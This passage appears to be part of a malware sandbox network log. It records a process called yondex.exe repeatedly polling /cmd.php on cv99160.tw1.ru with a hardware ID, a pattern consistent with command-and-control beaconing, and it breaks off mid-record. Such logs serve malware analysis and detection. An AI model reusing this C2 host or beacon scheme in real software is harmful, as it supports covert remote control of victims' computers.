                                                                              2024-06-23 09:33:12 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ac8dad0339d94104b81f2138c8a44a61; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:12 UTC  1                  IN         Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              80          192.168.2.4  49822        92.53.96.121    443               8064  C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp                Bytes transferred  Direction  Data
                                                                              2024-06-23 09:33:13 UTC  148                OUT        GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:14 UTC  357                IN         HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=b2e767fd7fbb40c1d66e8cddddda9183; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              81 | 192.168.2.4 | 49823 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:14 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:15 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e9229ac33942c9e772ad92f8ca6eaa54; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              82 | 192.168.2.4 | 49824 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:16 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:16 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2abe1135ffe9c0f94cc815b32a851375; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:16 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              83 | 192.168.2.4 | 49826 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:17 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:17 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=506a84dd472265c66e27cf522d872994; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              84 | 192.168.2.4 | 49827 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:18 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:18 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6145004982c0e3cadb6b253f92bae506; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:18 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              85 | 192.168.2.4 | 49828 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:19 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:20 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=39663e3f8122190ce5b90d2b90a93917; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              86 | 192.168.2.4 | 49829 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:23 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:23 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=158bcf7829f0a385de71cfcc080cdf66; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              87 | 192.168.2.4 | 49830 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:24 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:24 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c31e6d09781a29b4bb3f57c83a253833; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:24 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              88 | 192.168.2.4 | 49831 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:27 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:28 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:28 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=17cff0905b837661deca5e9f59e623fb; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              89 | 192.168.2.4 | 49832 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:29 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:29 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1b833358338339ee9e639a450ee0691b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:29 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              90 | 192.168.2.4 | 49833 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:32 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:32 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:32 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=487bb92847b35f60a71dc3771110a213; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              91 | 192.168.2.4 | 49834 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:33 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:34 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0fae2210cfb3762cda62a65c77170b71; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:34 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              92 | 192.168.2.4 | 49835 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:37 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:38 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0530a8ad29f61a63f6f73a10135f8627; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              93 | 192.168.2.4 | 49836 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:39 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:39 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9ded875ca8c6cabc1f095e5648a11911; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:39 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              94 | 192.168.2.4 | 49837 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:41 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:41 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=30bc2876f36a496f4892baee64804625; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              95 | 192.168.2.4 | 49838 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:42 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:42 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1b082adda46542133cd365ccb5d29aba; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:42 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              96 | 192.168.2.4 | 49839 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:43 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:43 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5da3d54346931780281a920e6b9cc820; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              97 | 192.168.2.4 | 49840 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:44 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:45 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1b409a62f0514f41f554dc54e764d330; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              98 | 192.168.2.4 | 49841 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:45 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:46 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=86fa6ee6c7293cfce5539071dc9c0689; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              99 | 192.168.2.4 | 49842 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:46 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:47 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=a73701951f31623ce2beac67fb15fd60; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              100 | 192.168.2.4 | 49844 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:48 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:48 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=aace48851006561d6328d57d0a5c0a47; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              101 | 192.168.2.4 | 49845 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:49 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:49 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=3ad9d1877934d6bac33ef57e70d1551e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:49 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              102 | 192.168.2.4 | 49846 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:51 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:52 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4d873cfc3f817515a4baece4ae74166b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              103 | 192.168.2.4 | 49847 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:52 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:53 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=243d6afa948662cc68cf567fbbb026bc; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:53 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              104 | 192.168.2.4 | 49848 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:33:56 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:33:56 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e3d3e6542c0ab9081672c9eae0198e41; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              105 | 192.168.2.4 | 49849 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
